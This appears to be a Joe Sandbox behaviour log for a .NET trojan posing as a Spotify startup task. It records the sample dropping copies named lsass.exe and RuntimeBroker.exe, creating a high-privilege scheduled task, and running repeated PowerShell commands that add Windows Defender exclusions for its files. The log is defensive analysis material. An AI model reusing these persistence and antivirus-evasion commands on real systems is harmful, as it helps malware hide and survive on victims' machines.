                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMPJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9B8516980_2_00007FFD9B851698
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC52D3C0_2_00007FFD9BC52D3C
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC47C400_2_00007FFD9BC47C40
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeCode function: 0_2_00007FFD9BC51F8C0_2_00007FFD9BC51F8C
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9B89169853_2_00007FFD9B891698
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 53_2_00007FFD9BC8574153_2_00007FFD9BC85741
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeCode function: 54_2_00007FFD9B86169854_2_00007FFD9B861698
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B88E5B555_2_00007FFD9B88E5B5
                    Source: C:\Recovery\USZqVcJFLA.exeCode function: 55_2_00007FFD9B86169855_2_00007FFD9B861698
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AsBtWtog.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                    Source: uhdUZoxx.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: vnccfbfp.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: RzSYqgUu.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: AsBtWtog.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: JNKHlxGvw4.exe, 00000000.00000000.1696681198.00000000001B4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs JNKHlxGvw4.exe
                    Source: JNKHlxGvw4.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs JNKHlxGvw4.exe
                    Source: JNKHlxGvw4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: JNKHlxGvw4.exeStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: lsass.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: USZqVcJFLA.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: RuntimeBroker.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: SystemSettings.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: uhdUZoxx.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: vnccfbfp.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: RzSYqgUu.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: AsBtWtog.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.JNKHlxGvw4.exe.1257bc70.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.JNKHlxGvw4.exe.12885b30.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@47/59@1/1
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\Desktop\uhdUZoxx.logJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
                    Source: C:\Recovery\USZqVcJFLA.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                    Source: C:\Recovery\USZqVcJFLA.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-uarUuV05qHqkni1Ppe0P
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile created: C:\Users\user\AppData\Local\Temp\eaiouozrJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat"
                    Source: JNKHlxGvw4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: JNKHlxGvw4.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: JNKHlxGvw4.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile read: C:\Users\user\Desktop\JNKHlxGvw4.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\JNKHlxGvw4.exe "C:\Users\user\Desktop\JNKHlxGvw4.exe"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5227.tmp" "c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f
                    Source: unknownProcess created: C:\Users\user\Favorites\lsass.exe C:\Users\user\Favorites\lsass.exe
                    Source: unknownProcess created: C:\Users\user\Favorites\lsass.exe C:\Users\user\Favorites\lsass.exe
                    Source: unknownProcess created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                    Source: unknownProcess created: C:\Recovery\USZqVcJFLA.exe C:\Recovery\USZqVcJFLA.exe
                    Source: unknownProcess created: C:\Recovery\USZqVcJFLA.exe C:\Recovery\USZqVcJFLA.exe
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: unknownProcess created: C:\Users\user\Desktop\JNKHlxGvw4.exe C:\Users\user\Desktop\JNKHlxGvw4.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\JNKHlxGvw4.exe C:\Users\user\Desktop\JNKHlxGvw4.exe
                    Source: unknownProcess created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
                    Source: unknownProcess created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exe "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\USZqVcJFLA.exe "C:\Recovery\USZqVcJFLA.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                    Source: unknownProcess created: C:\Recovery\USZqVcJFLA.exe "C:\Recovery\USZqVcJFLA.exe"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5227.tmp" "c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\USZqVcJFLA.exe "C:\Recovery\USZqVcJFLA.exe"
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Favorites\lsass.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
